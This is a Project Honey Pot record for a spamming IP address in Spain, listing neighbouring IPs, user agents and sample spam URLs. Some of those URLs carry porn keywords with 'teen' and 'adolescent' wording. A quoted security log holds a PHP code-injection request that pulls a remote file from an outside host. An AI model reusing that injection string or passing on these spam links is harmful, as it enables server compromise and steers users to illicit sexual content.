IP Address Inspector

ATTENTION
  • This IP has not seen any suspicious activity within the last 3 months. This IP is most likely clean and trustworthy now. (This record will remain public for historical purposes, however.)

217.12.16.56

The Project Honey Pot system has detected behavior from the IP address consistent with that of a comment spammer. Below we've reported some other data associated with this IP. This interrelated data helps map spammers' networks and aids in law enforcement efforts. If you know something about this IP, please leave a comment.

Lookup IP In: Domain Tools | SpamHaus | Spamcop | SenderBase | Google Groups | Google

Geographic Location Spain Spain
Spider First Seen approximately 18 years, 7 months, 4 weeks ago
Spider Last Seen within 5 years, 1 month, 3 weeks
Spider Sightings 26 visit(s)
User-Agents seen with 25 user-agent(s)

First Post On approximately 15 years, 6 months, 2 weeks ago
Last Post On within 15 years, 6 months, 2 weeks
Form Posts 4 web post submission(s) sent from this IP

IPs In The Neighborhood
217.12.15.90 Great Britain
217.12.15.100 Great Britain
217.12.15.182 Great Britain
217.12.15.255 Great Britain
217.12.16.48 | C Spain
217.12.16.49 | C Spain
217.12.16.50 | C Spain
217.12.16.51 | C Spain
217.12.16.52 | C Spain
217.12.16.53 | C Spain
217.12.16.54 | C Spain
217.12.16.69 | S Spain
217.12.16.130 Spain
217.12.16.131 | C Spain
217.12.16.132 Spain
217.12.16.134 Spain
217.12.16.137 Spain
217.12.16.172 Spain
217.12.16.194 Spain
217.12.16.221 Spain
217.12.16.249 Spain
217.12.16.250 Spain
217.12.16.251 Spain
217.12.16.253 Spain
217.12.16.254 Spain
217.12.17.19 Spain
Sample Spam URLs & Keywords Posted From 217.12.16.56
Domain: dinorahsides.medblog.org.ua
URL: http://dinorahsides.medblog.org.ua/index.php?blogId=110
Keywords: brooke burke nude
Domain: teen.sc69.by.ru
URL: http://teen.sc69.by.ru/672iiidxy-porno-video-smotret-besplatno-zhest.html
Keywords:
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/60-s-models-twiggy.html
Keywords: 60 s models twiggy
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/aag-models.html
Keywords: aag models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-and-fitch-male-models.html
Keywords: abercrombie and fitch male models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-and-fitch-models.html
Keywords: abercrombie and fitch models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-fitch-male-models.html
Keywords: abercrombie fitch male models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-fitch-models.html
Keywords: abercrombie fitch models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-male-models.html
Keywords: abercrombie male models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-models.html
Keywords: abercrombie models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/ace-models.html
Keywords: ace models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/adolescent-models.html
Keywords: adolescent models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/60-s-models-twiggy.html
Keywords: adolescent models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/aag-models.html
Keywords: adolescent models
Domain: models1were.325mb.com
URL: http://models1were.325mb.com/abercrombie-and-fitch-male-models.html
Keywords: adolescent models
217.12.16.56's User Agent Strings
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/32.0.1700.76; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/32.0.1700.76; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; QQDownload 534; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; chromeframe/32.0.1700.76; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19
Web Downloader/6.9
J.Fitch commented...
Used as a puppet to serve up malicious files.
[Wed Jun 20 03:17:51 2012] [error] [client 217.12.16.56] [msg "Generic PHP code injection protection in URI"] [severity "CRITICAL"] [uri "/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt"]
June 21 2012 04:05 AM

Page generated on: April 18 2024 04:39:34 AM
tanishacollier247@outlook.com sonyajewell962@outlook.com brittneybradley984@vbwebmail.com vernonmichael769@outlook.com
do not follow this link

Privacy Policy | Terms of Use | About Project Honey Pot | FAQ | Cloudflare Site Protection | Contact Us

Copyright © 2004–24, Unspam Technologies, Inc. All rights reserved.

Advertisements displayed on this page are not necessarily endorsed by Project Honey Pot

contact | wiki | email